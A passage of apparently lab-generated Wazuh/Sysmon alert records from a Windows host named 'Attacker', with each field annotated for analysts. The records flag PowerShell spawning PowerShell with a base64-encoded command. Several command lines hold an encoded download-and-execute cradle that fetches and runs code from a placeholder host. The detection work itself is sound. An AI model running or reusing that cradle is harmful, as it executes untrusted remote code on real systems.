data.win.eventdata.processGuid: {94294ddc-c178-680a-e60c-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 12424 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetFilename: C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_mciyuvr4.sxa.ps1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.creationUtcTime: 2025-04-24 22:55:54.983 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Powershell.exe spawned a powershell process which executed a base64 encoded command Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92057 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1059.001'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Execution'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['PowerShell'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 121 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid1_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745535362.2751724 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 1 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 5 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 1 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:56:00.0931226Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 350561 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "Process Create:
RuleName: -
UtcTime: 2025-04-24 22:55:58.970
ProcessGuid: {94294ddc-c17e-680a-e90c-000000000e00}
ProcessId: 17020
Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
FileVersion: 10.0.26100.3323 (WinBuild.160101.0800)
Description: Windows PowerShell
Product: Microsoft® Windows® Operating System
Company: Microsoft Corporation
OriginalFileName: PowerShell.EXE
CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
CurrentDirectory: C:\Users\Attcker1\
User: Attacker\Attcker1
LogonGuid: {94294ddc-ea85-67fe-8465-020000000000}
LogonId: 0x26584
TerminalSessionId: 1
IntegrityLevel: Medium
Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
ParentProcessGuid: {94294ddc-c178-680a-e60c-000000000e00}
ParentProcessId: 12424
ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
ParentUser: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:55:58.970 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-c17e-680a-e90c-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 17020 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.fileVersion: 10.0.26100.3323 (WinBuild.160101.0800) No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.description: Windows PowerShell No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.product: Microsoft® Windows® Operating System No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.company: Microsoft Corporation No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.originalFileName: PowerShell.EXE No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.commandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.currentDirectory: C:\\Users\\Attcker1\\ No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonGuid: {94294ddc-ea85-67fe-8465-020000000000} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonId: 0x26584 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.terminalSessionId: 1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.integrityLevel: Medium No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessGuid: {94294ddc-c178-680a-e60c-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessId: 12424 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentCommandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentUser: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Executable file dropped in folder commonly used by malware Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92213 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1105'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Command and Control'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['Ingress Tool Transfer'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 125 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid11_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745535362.2759795 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 11 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 2 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 11 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:56:00.3687114Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 350564 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "File created:
RuleName: -
UtcTime: 2025-04-24 22:56:00.355
ProcessGuid: {94294ddc-c17e-680a-e90c-000000000e00}
ProcessId: 17020
Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe
TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_vzf12wvk.xny.ps1
CreationUtcTime: 2025-04-24 22:56:00.355
User: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:56:00.355 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-c17e-680a-e90c-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 17020 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetFilename: C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_vzf12wvk.xny.ps1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.creationUtcTime: 2025-04-24 22:56:00.355 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Powershell.exe spawned a powershell process which executed a base64 encoded command Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92057 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1059.001'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Execution'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['PowerShell'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 122 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid1_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745535365.2762564 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 1 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 5 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 1 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:56:03.3106068Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 350595 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "Process Create:
RuleName: -
UtcTime: 2025-04-24 22:56:01.682
ProcessGuid: {94294ddc-c181-680a-eb0c-000000000e00}
ProcessId: 384
Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
FileVersion: 10.0.26100.3323 (WinBuild.160101.0800)
Description: Windows PowerShell
Product: Microsoft® Windows® Operating System
Company: Microsoft Corporation
OriginalFileName: PowerShell.EXE
CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
CurrentDirectory: C:\Users\Attcker1\
User: Attacker\Attcker1
LogonGuid: {94294ddc-ea85-67fe-8465-020000000000}
LogonId: 0x26584
TerminalSessionId: 1
IntegrityLevel: Medium
Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
ParentProcessGuid: {94294ddc-c17e-680a-e90c-000000000e00}
ParentProcessId: 17020
ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
ParentUser: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:56:01.682 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-c181-680a-eb0c-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 384 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.fileVersion: 10.0.26100.3323 (WinBuild.160101.0800) No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.description: Windows PowerShell No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.product: Microsoft® Windows® Operating System No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.company: Microsoft Corporation No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.originalFileName: PowerShell.EXE No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.commandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.currentDirectory: C:\\Users\\Attcker1\\ No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonGuid: {94294ddc-ea85-67fe-8465-020000000000} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonId: 0x26584 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.terminalSessionId: 1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.integrityLevel: Medium No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessGuid: {94294ddc-c17e-680a-e90c-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessId: 17020 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentCommandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentUser: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Executable file dropped in folder commonly used by malware Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92213 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1105'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Command and Control'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['Ingress Tool Transfer'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 126 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid11_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745535366.2770627 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 11 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 2 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 11 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:56:03.7645310Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 350596 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "File created:
RuleName: -
UtcTime: 2025-04-24 22:56:03.676
ProcessGuid: {94294ddc-c181-680a-eb0c-000000000e00}
ProcessId: 384
Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe
TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_k4xjswto.1mn.ps1
CreationUtcTime: 2025-04-24 22:56:03.676
User: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:56:03.676 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-c181-680a-eb0c-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 384 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetFilename: C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_k4xjswto.1mn.ps1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.creationUtcTime: 2025-04-24 22:56:03.676 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Powershell.exe spawned a powershell process which executed a base64 encoded command Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92057 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1059.001'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Execution'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['PowerShell'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 123 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid1_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745535370.2773388 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 1 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 5 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 1 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:56:07.9049338Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 350610 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "Process Create:
RuleName: -
UtcTime: 2025-04-24 22:56:05.130
ProcessGuid: {94294ddc-c185-680a-ed0c-000000000e00}
ProcessId: 15128
Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
FileVersion: 10.0.26100.3323 (WinBuild.160101.0800)
Description: Windows PowerShell
Product: Microsoft® Windows® Operating System
Company: Microsoft Corporation
OriginalFileName: PowerShell.EXE
